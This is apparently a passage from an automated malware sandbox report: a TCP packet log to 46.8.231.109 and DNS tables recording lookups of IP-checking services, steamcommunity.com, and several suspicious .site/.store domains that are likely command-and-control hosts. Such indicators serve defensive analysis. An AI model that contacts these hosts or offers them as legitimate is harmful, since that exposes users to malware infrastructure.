                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.966340065 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.966355085 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.966358900 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.966370106 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.966381073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.966392040 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.966392994 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.966403008 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.966413975 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:13.966439009 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047699928 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047760963 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047774076 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047785997 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047796965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047805071 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047821999 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047837019 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047861099 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047871113 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047882080 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047885895 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047894001 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047899008 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047914982 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047926903 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.047986984 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048001051 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048006058 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048023939 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048027039 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048038006 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048038960 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048049927 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048078060 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048089981 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048211098 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048221111 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048235893 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048239946 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048248053 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048254013 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048269987 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048279047 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048345089 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048355103 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048367023 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048374891 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048393011 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048403025 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048558950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048569918 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048579931 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048590899 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048593998 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048602104 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048605919 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048613071 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048621893 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048624039 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048635006 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048645020 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048650026 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048656940 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048667908 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048667908 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048680067 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048681021 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048692942 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048703909 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048726082 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048887014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048899889 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048912048 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048921108 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048923016 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048933983 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048934937 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048952103 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048957109 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048962116 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048966885 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048978090 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048983097 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.048991919 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.049000978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.049005032 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.049014091 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.049021006 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.049024105 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.049036026 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.049043894 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.049045086 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.049057007 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.049078941 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051281929 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051378012 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051394939 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051426888 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051449060 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051460981 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051469088 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051472902 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051490068 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051497936 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051523924 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051563978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051597118 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051645994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051657915 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051692963 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051805019 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051817894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051829100 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051842928 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051842928 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051856041 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.051877022 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052405119 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052416086 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052428007 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052436113 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052449942 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052463055 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052464962 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052474976 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052486897 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052501917 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052505016 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052517891 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052517891 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052546978 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052722931 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052735090 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052747965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052759886 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052772999 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052786112 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052870989 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052882910 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052894115 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052906990 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052911997 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052934885 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.052990913 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053002119 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053014040 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053020000 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053030014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053041935 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053042889 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053066015 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053083897 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053168058 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053179979 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053214073 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053618908 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053630114 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053642988 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053663969 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.053677082 CEST5851580192.168.2.646.8.231.109

                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.230607033 CEST192.168.2.61.1.1.10x607bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.871417046 CEST192.168.2.61.1.1.10xd0c6Standard query (0)yalubluseks.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:53.989989042 CEST192.168.2.61.1.1.10xc12fStandard query (0)api64.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.832293987 CEST192.168.2.61.1.1.10xd71Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:03.673053980 CEST192.168.2.61.1.1.10x105eStandard query (0)iplogger.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:19.508847952 CEST192.168.2.61.1.1.10x7a90Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:20.928181887 CEST192.168.2.61.1.1.10x203Standard query (0)chorusarorp.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:20.967658997 CEST192.168.2.61.1.1.10xf29aStandard query (0)questionsmw.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:22.109273911 CEST192.168.2.61.1.1.10xe221Standard query (0)soldiefieop.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:23.207243919 CEST192.168.2.61.1.1.10xdc1dStandard query (0)abnomalrkmu.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:24.177812099 CEST192.168.2.61.1.1.10x4d0aStandard query (0)treatynreit.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:25.244738102 CEST192.168.2.61.1.1.10x2b5dStandard query (0)snarlypagowo.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:26.254004955 CEST192.168.2.61.1.1.10x8264Standard query (0)mysterisop.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:27.272696018 CEST192.168.2.61.1.1.10xc677Standard query (0)absorptioniw.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:29.687122107 CEST192.168.2.61.1.1.10xee2bStandard query (0)gravvitywio.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:01.789777994 CEST192.168.2.61.1.1.10xaf15Standard query (0)chorusarorp.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:10.145442963 CEST192.168.2.61.1.1.10xfa4dStandard query (0)cowod.hopto.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:11.109715939 CEST192.168.2.61.1.1.10xc16cStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:23.548682928 CEST192.168.2.61.1.1.10xf506Standard query (0)chorusarorp.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:27.971270084 CEST192.168.2.61.1.1.10x6169Standard query (0)chorusarorp.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:33.369558096 CEST192.168.2.61.1.1.10xdf2cStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:42.640625000 CEST192.168.2.61.1.1.10x66bdStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:51.052483082 CEST192.168.2.61.1.1.10xaa4bStandard query (0)55.235.10.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:20.120908976 CEST192.168.2.61.1.1.10xbf09Standard query (0)55.235.10.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:13.479038000 CEST192.168.2.61.1.1.10xa1f9Standard query (0)55.235.10.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:15.638792038 CEST192.168.2.61.1.1.10x4f5eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:25.594893932 CEST192.168.2.61.1.1.10xcd39Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.237435102 CEST1.1.1.1192.168.2.60x607bNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.237435102 CEST1.1.1.1192.168.2.60x607bNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.237435102 CEST1.1.1.1192.168.2.60x607bNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.882208109 CEST1.1.1.1192.168.2.60xd0c6No error (0)yalubluseks.eu172.67.140.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.882208109 CEST1.1.1.1192.168.2.60xd0c6No error (0)yalubluseks.eu104.21.54.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:53.996836901 CEST1.1.1.1192.168.2.60xc12fNo error (0)api64.ipify.org173.231.16.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:53.996836901 CEST1.1.1.1192.168.2.60xc12fNo error (0)api64.ipify.org104.237.62.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.839163065 CEST1.1.1.1192.168.2.60xd71No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:03.685106993 CEST1.1.1.1192.168.2.60x105eNo error (0)iplogger.org104.26.3.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:03.685106993 CEST1.1.1.1192.168.2.60x105eNo error (0)iplogger.org172.67.74.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:03.685106993 CEST1.1.1.1192.168.2.60x105eNo error (0)iplogger.org104.26.2.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:19.519119024 CEST1.1.1.1192.168.2.60x7a90No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:20.937504053 CEST1.1.1.1192.168.2.60x203Name error (3)chorusarorp.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:20.981956005 CEST1.1.1.1192.168.2.60xf29aNo error (0)questionsmw.store172.67.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:20.981956005 CEST1.1.1.1192.168.2.60xf29aNo error (0)questionsmw.store104.21.77.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:22.121404886 CEST1.1.1.1192.168.2.60xe221No error (0)soldiefieop.site188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:22.121404886 CEST1.1.1.1192.168.2.60xe221No error (0)soldiefieop.site188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:23.221523046 CEST1.1.1.1192.168.2.60xdc1dNo error (0)abnomalrkmu.site104.21.56.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:23.221523046 CEST1.1.1.1192.168.2.60xdc1dNo error (0)abnomalrkmu.site172.67.152.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:24.189888000 CEST1.1.1.1192.168.2.60x4d0aNo error (0)treatynreit.site172.67.184.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:24.189888000 CEST1.1.1.1192.168.2.60x4d0aNo error (0)treatynreit.site104.21.84.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:25.258433104 CEST1.1.1.1192.168.2.60x2b5dNo error (0)snarlypagowo.site104.21.18.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:25.258433104 CEST1.1.1.1192.168.2.60x2b5dNo error (0)snarlypagowo.site172.67.183.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:26.266827106 CEST1.1.1.1192.168.2.60x8264No error (0)mysterisop.site172.67.195.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:26.266827106 CEST1.1.1.1192.168.2.60x8264No error (0)mysterisop.site104.21.21.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:27.286029100 CEST1.1.1.1192.168.2.60xc677No error (0)absorptioniw.site104.21.17.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:27.286029100 CEST1.1.1.1192.168.2.60xc677No error (0)absorptioniw.site172.67.177.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:29.696299076 CEST1.1.1.1192.168.2.60xee2bNo error (0)gravvitywio.store104.21.16.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:29.696299076 CEST1.1.1.1192.168.2.60xee2bNo error (0)gravvitywio.store172.67.209.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:01.799034119 CEST1.1.1.1192.168.2.60xaf15Name error (3)chorusarorp.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:10.154162884 CEST1.1.1.1192.168.2.60xfa4dNo error (0)cowod.hopto.org45.132.206.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:11.117557049 CEST1.1.1.1192.168.2.60xc16cNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:23.558351040 CEST1.1.1.1192.168.2.60xf506Name error (3)chorusarorp.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:28.918595076 CEST1.1.1.1192.168.2.60x6169Name error (3)chorusarorp.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:33.377579927 CEST1.1.1.1192.168.2.60xdf2cNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:42.647658110 CEST1.1.1.1192.168.2.60x66bdNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:51.059907913 CEST1.1.1.1192.168.2.60xaa4bName error (3)55.235.10.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:20.128374100 CEST1.1.1.1192.168.2.60xbf09Name error (3)55.235.10.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
